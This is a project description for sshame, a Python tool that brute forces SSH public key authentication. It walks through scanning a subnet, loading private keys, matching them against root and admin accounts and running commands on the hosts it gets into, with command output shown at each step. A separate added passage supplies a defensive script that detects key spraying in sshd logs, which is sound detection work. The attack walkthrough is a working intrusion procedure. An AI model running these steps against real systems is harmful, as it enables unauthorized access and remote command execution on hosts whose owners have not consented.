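SSH public key brute force tool
Detailed description of the sshame Python project
sshame - SSH public key brute force tool
An interactive tool to brute force SSH public key authentication. It is intended primarily for pentesters. sshame can execute commands on remote hosts.
Version history
sshame 0.5 - 2019-08-25
Initial version
Installation
Clone the source code from GitHub: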
git clone https://github.com/HynekPetrak/sshame.git
cd sshame
Then, to install, run:
sudo python3 setup.py install
If you want to contribute rather than just install, run:
sudo python3 setup.py develop
Basic usage
sshame is interactive and based on https://github.com/python-cmd2/cmd2
# sshame
(sshame)
Type "help" to get the list of commands:
(sshame) help
Documented commands (type help <topic>):
Sshame
======
commands creds exploit hosts keys resolve session
Uncategorized
=============
alias help macro py record run_script shell
edit history playback quit run_pyscript set shortcuts
Adding target hosts
In the sshame shell, run hosts -a list-of-ip-ranges-or-hosts [-p port]:
(sshame) hosts -a 10.0.0.0/24 -p 22
Scanning 10.0.0.0/24 on port(s) 22
........***.............
Received 877 packets, got 222 answers, remaining 34 packets
2019-08-25 19:22:15,633 sshame [I] 'Adding host (port open): 10.0.0.2 22'
2019-08-25 19:22:15,683 sshame [I] 'Adding host (port open): 10.0.0.1 22'
2019-08-25 19:22:15,686 sshame [I] 'Adding host (port open): 10.0.0.6 22'
sshame uses scapy to scan the given hosts and adds those that have the port open.
To verify which hosts were added with an open TCP port, run hosts -l
Loading SSH keys
Use keys -a glob_path [-p list-of-passwords]
(sshame) keys -a test/**/*key
2019-08-25 19:30:40,613 sshame [I] "Adding ssh keys from: ['test/**/*key']"
2019-08-25 19:30:40,614 sshame [I] "Discovered 4 files in 'test/**/*key'."
2019-08-25 19:30:40,615 sshame [I] 'Going to examine 4 files.'
2019-08-25 19:30:40,635 sshame [I] 'Importing ssh-dss key: test/keys/dsa_key'
2019-08-25 19:30:40,645 sshame [I] 'Importing ssh-rsa key: test/keys/rsa_key'
2019-08-25 19:30:40,680 sshame [I] 'Importing ecdsa-sha2-nistp256 key: test/keys/ecdsa_key'
2019-08-25 19:30:40,693 sshame [I] 'Importing ssh-ed25519 key: test/keys/ed25519_key'
Loaded 4 unique keys, ignoring 0 duplicates
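-p list-of-passwords is optional and is used when loading password-protected, encrypted private keys.
Use keys -l
Testing keys on hosts
To brute force which key authenticates on which target, run exploit -u list-of-users: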
(sshame) exploit -u root admin
2019-08-25 19:34:31,900 sshame [I] 'Preparing target jobs...'
2019-08-25 19:34:31,933 sshame [I] 'Matching keys - 16 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 19:34:56,857 sshame [I] '---------------------------------------------------------------------------'
List the matching keys with creds -l:
(sshame) creds -l
[1/1/1]: ssh -i test/keys/rsa_key root@10.0.0.2
[2/2/1]: ssh -i test/keys/dsa_key admin@10.0.0.1
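Seen from the target's side, the key testing described above leaves one "Failed publickey" entry in the sshd log for each rejected key. The following is an added example, not part of sshame or its README: it assumes OpenSSH's auth log format with SHA256 fingerprints, and it flags sources that had several distinct keys rejected. The sample lines, the function name and the threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# OpenSSH sshd logs a rejected key as:
#   Failed publickey for [invalid user ]USER from ADDR port N ssh2: TYPE SHA256:...
FAILED_PUBKEY = re.compile(
    r"sshd\[\d+\]: Failed publickey for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2: \S+ (?P<fp>SHA256:\S+)"
)

# Constructed sample lines (hosts, addresses and fingerprints are made up).
SAMPLE_LOG = """\
Aug 25 19:34:32 web1 sshd[2101]: Failed publickey for root from 192.0.2.10 port 40112 ssh2: DSA SHA256:constructedFP1
Aug 25 19:34:32 web1 sshd[2101]: Failed publickey for root from 192.0.2.10 port 40112 ssh2: RSA SHA256:constructedFP2
Aug 25 19:34:33 web1 sshd[2104]: Failed publickey for root from 192.0.2.10 port 40118 ssh2: ECDSA SHA256:constructedFP3
Aug 25 19:34:33 web1 sshd[2104]: Failed publickey for root from 192.0.2.10 port 40118 ssh2: ED25519 SHA256:constructedFP4
Aug 25 19:34:34 web1 sshd[2107]: Failed publickey for invalid user admin from 192.0.2.10 port 40120 ssh2: RSA SHA256:constructedFP2
Aug 25 19:40:02 web1 sshd[2230]: Failed publickey for deploy from 192.0.2.20 port 51514 ssh2: RSA SHA256:constructedFP9
Aug 25 19:40:02 web1 sshd[2230]: Accepted publickey for deploy from 192.0.2.20 port 51514 ssh2: ED25519 SHA256:constructedFP8
"""


def find_key_spraying(lines, min_keys=3):
    """Map each source that had >= min_keys distinct keys rejected to a summary."""
    keys, users = defaultdict(set), defaultdict(set)
    for line in lines:
        m = FAILED_PUBKEY.search(line)
        if m is None:
            continue  # accepted logins and unrelated lines are ignored
        keys[m["src"]].add(m["fp"])
        users[m["src"]].add(m["user"])
    return {
        src: {"keys": len(fps), "users": sorted(users[src])}
        for src, fps in keys.items()
        if len(fps) >= min_keys
    }


if __name__ == "__main__":
    for src, info in find_key_spraying(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {info['keys']} distinct keys rejected for users {info['users']}")
```

The min_keys threshold (an assumed default of 3) keeps a single user whose agent offers one wrong key before the right one, like 192.0.2.20 in the sample, out of the results.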
Running commands on remote hosts
To run a command on the remote hosts, use exploit -c command, for example:
(sshame) exploit -c whoami
2019-08-25 23:28:22,757 sshame [I] 'Preparing target jobs...'
2019-08-25 23:28:22,763 sshame [I] 'Executing commands - 2 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 23:28:23,993 sshame [I] '---------------------------------------------------------------------------'
Displaying command results
Display the results with commands -r:
(sshame) commands -r
Entries: 2
| guid | host_address | host_port | username | cmd | exit_status | output | updated |
|--------------------------------------+----------------+-------------+------------+----------------------+---------------+-----------------+---------------------|
| 434f163a-24b5-4775-a3c1-6ea41745b18d | 10.0.0.2 | 22 | root | whoami | 0 | root | 2019-08-25 21:28:23 |
| 305e3f5d-bf4d-4024-981a-59b2dddebbcd | 10.0.0.1 | 22 | admin | whoami | 0 | admin | 2019-08-25 21:28:23 |
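Session management
You may need to split your workload into several sessions. Use session name to switch between sessions. The default session is called "default".
Each session's data is stored in a separate SQLite database in the current directory, named after the session, e.g. default.db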
(sshame) session test
2019-08-25 23:38:38,283 sshame [I] 'Openning session: sqlite:///test.db'